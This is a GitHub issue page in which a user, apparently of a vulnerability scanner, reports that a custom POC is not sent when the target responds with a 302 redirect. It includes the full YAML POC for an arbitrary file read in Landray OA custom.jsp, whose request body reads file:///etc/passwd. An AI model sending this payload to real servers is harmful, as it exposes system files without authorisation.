We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
写POC时候发现以下问题
params: [] name: 蓝凌OA custom.jsp-任意文件读取 set: {} rules:
以下是正常加载 网站没有302跳转,数据包看到是成功加载了POC,发送了一条POST请求
换一个网站,存在302跳转,看Burp的数据包发现并没有加载POC进行检测
The text was updated successfully, but these errors were encountered:
No branches or pull requests
写POC时候发现以下问题
params: []
name: 蓝凌OA custom.jsp-任意文件读取
set: {}
rules:
path: /sys/ui/extend/varkind/custom.jsp
headers: {}
body: var={"body":{"file":"file:///etc/passwd"}}
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"root")'
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
以下是正常加载
网站没有302跳转,数据包看到是成功加载了POC,发送了一条POST请求
换一个网站,存在302跳转,看Burp的数据包发现并没有加载POC进行检测
The text was updated successfully, but these errors were encountered: